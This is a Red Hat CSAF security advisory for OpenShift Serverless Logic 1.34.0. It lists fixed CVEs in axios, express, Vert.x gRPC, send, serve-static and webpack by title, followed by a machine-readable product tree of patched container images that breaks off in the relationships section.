Vulnerability from csaf_redhat - Published: 2024-10-14 00:59 - Updated: 2025-11-21 19:14Summary
Red Hat Security Advisory: Release of OpenShift Serverless Logic 1.34.0 security update & enhancements
Notes
Topic
Release of OpenShift Serverless Logic 1.34.0
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
This release includes security, bug fixes, and enhancements.
Security Fix(es):
* axios: axios: Server-Side Request Forgery (CVE-2024-39338)
* express: Improper Input Handling in Express Redirects (CVE-2024-43796)
* io.vertx/vertx-grpc-client: Vertx gRPC server does not limit the maximum message size (CVE-2024-8391)
* io.vertx/vertx-grpc-server: Vertx gRPC server does not limit the maximum message size (CVE-2024-8391)
* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)
* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)
* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule (CVE-2024-43788)
For more details about the security issues, including the impact, a CVSS score, acknowledgements, and other related information, refer to the CVE pages listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Release of OpenShift Serverless Logic 1.34.0\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "This release includes security, bug fixes, and enhancements.\n\nSecurity Fix(es):\n\n* axios: axios: Server-Side Request Forgery (CVE-2024-39338)\n\n* express: Improper Input Handling in Express Redirects (CVE-2024-43796)\n\n* io.vertx/vertx-grpc-client: Vertx gRPC server does not limit the maximum message size (CVE-2024-8391)\n\n* io.vertx/vertx-grpc-server: Vertx gRPC server does not limit the maximum message size (CVE-2024-8391)\n\n* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)\n\n* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)\n\n* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule (CVE-2024-43788)\n\nFor more details about the security issues, including the impact, a CVSS score, acknowledgements, and other related information, refer to the CVE pages listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2024:8023",
"url": "https://access.redhat.com/errata/RHSA-2024:8023"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "2308193",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308193"
},
{
"category": "external",
"summary": "2309758",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2309758"
},
{
"category": "external",
"summary": "2311152",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311152"
},
{
"category": "external",
"summary": "2311153",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311153"
},
{
"category": "external",
"summary": "2311154",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311154"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8023.json"
}
],
"title": "Red Hat Security Advisory: Release of OpenShift Serverless Logic 1.34.0 security update \u0026 enhancements",
"tracking": {
"current_release_date": "2025-11-21T19:14:16+00:00",
"generator": {
"date": "2025-11-21T19:14:16+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.6.12"
}
},
"id": "RHSA-2024:8023",
"initial_release_date": "2024-10-14T00:59:58+00:00",
"revision_history": [
{
"date": "2024-10-14T00:59:58+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2024-10-14T00:59:58+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2025-11-21T19:14:16+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "8Base-Openshift-Serverless-1.34",
"product": {
"name": "8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift_serverless:1.34::el8"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift Serverless"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"product": {
"name": "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"product_id": "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"product_identification_helper": {
"purl": "pkg:oci/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2?arch=amd64\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-data-index-ephemeral-rhel8\u0026tag=1.34.0-6"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"product": {
"name": "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"product_id": "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"product_identification_helper": {
"purl": "pkg:oci/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03?arch=amd64\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-data-index-postgresql-rhel8\u0026tag=1.34.0-6"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"product": {
"name": "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"product_id": "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"product_identification_helper": {
"purl": "pkg:oci/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1?arch=amd64\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-jobs-service-ephemeral-rhel8\u0026tag=1.34.0-5"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"product": {
"name": "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"product_id": "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"product_identification_helper": {
"purl": "pkg:oci/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe?arch=amd64\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-jobs-service-postgresql-rhel8\u0026tag=1.34.0-6"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"product": {
"name": "openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"product_id": "openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"product_identification_helper": {
"purl": "pkg:oci/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47?arch=amd64\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8\u0026tag=1.34.0-2"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"product": {
"name": "openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"product_id": "openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"product_identification_helper": {
"purl": "pkg:oci/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442?arch=amd64\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-management-console-rhel8\u0026tag=1.34.0-5"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"product": {
"name": "openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"product_id": "openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"product_identification_helper": {
"purl": "pkg:oci/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314?arch=amd64\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-operator-bundle\u0026tag=1.34.0-5"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"product": {
"name": "openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"product_id": "openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"product_identification_helper": {
"purl": "pkg:oci/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb?arch=amd64\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-rhel8-operator\u0026tag=1.34.0-5"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"product": {
"name": "openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"product_id": "openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"product_identification_helper": {
"purl": "pkg:oci/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391?arch=amd64\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-swf-builder-rhel8\u0026tag=1.34.0-6"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"product": {
"name": "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"product_id": "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d?arch=amd64\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-swf-devmode-rhel8\u0026tag=1.34.0-6"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"product": {
"name": "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"product_id": "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"product_identification_helper": {
"purl": "pkg:oci/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03?arch=arm64\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-data-index-ephemeral-rhel8\u0026tag=1.34.0-6"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"product": {
"name": "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"product_id": "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"product_identification_helper": {
"purl": "pkg:oci/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64?arch=arm64\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-data-index-postgresql-rhel8\u0026tag=1.34.0-6"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"product": {
"name": "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"product_id": "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"product_identification_helper": {
"purl": "pkg:oci/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6?arch=arm64\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-jobs-service-ephemeral-rhel8\u0026tag=1.34.0-5"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"product": {
"name": "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"product_id": "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f?arch=arm64\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-jobs-service-postgresql-rhel8\u0026tag=1.34.0-6"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"product": {
"name": "openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"product_id": "openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"product_identification_helper": {
"purl": "pkg:oci/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1?arch=arm64\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8\u0026tag=1.34.0-2"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"product": {
"name": "openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"product_id": "openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"product_identification_helper": {
"purl": "pkg:oci/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba?arch=arm64\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-operator-bundle\u0026tag=1.34.0-5"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"product": {
"name": "openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"product_id": "openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"product_identification_helper": {
"purl": "pkg:oci/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28?arch=arm64\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-rhel8-operator\u0026tag=1.34.0-5"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"product": {
"name": "openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"product_id": "openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"product_identification_helper": {
"purl": "pkg:oci/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0?arch=arm64\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-swf-builder-rhel8\u0026tag=1.34.0-6"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64",
"product": {
"name": "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64",
"product_id": "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64",
"product_identification_helper": {
"purl": "pkg:oci/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9?arch=arm64\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-swf-devmode-rhel8\u0026tag=1.34.0-6"
}
}
}
],
"category": "architecture",
"name": "arm64"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"product": {
"name": "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"product_id": "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-data-index-ephemeral-rhel8\u0026tag=1.34.0-6"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"product": {
"name": "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"product_id": "openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-data-index-postgresql-rhel8\u0026tag=1.34.0-6"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"product": {
"name": "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"product_id": "openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-jobs-service-ephemeral-rhel8\u0026tag=1.34.0-5"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"product": {
"name": "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"product_id": "openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-jobs-service-postgresql-rhel8\u0026tag=1.34.0-6"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"product": {
"name": "openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"product_id": "openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-operator-bundle\u0026tag=1.34.0-5"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"product": {
"name": "openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"product_id": "openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-rhel8-operator\u0026tag=1.34.0-5"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"product": {
"name": "openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"product_id": "openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-swf-builder-rhel8\u0026tag=1.34.0-6"
}
}
},
{
"category": "product_version",
"name": "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"product": {
"name": "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"product_id": "openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-serverless-1/logic-swf-devmode-rhel8\u0026tag=1.34.0-6"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64 as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64"
},
"product_reference": "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le as a component of 8Base-Openshift-Serverless-1.34",
"product_id": "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le"
},
"product_reference": "openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"relates_to_product_reference": "8Base-RHOSS-1.34"
},
{
"category": "default_component_of",
"full_product_name": {
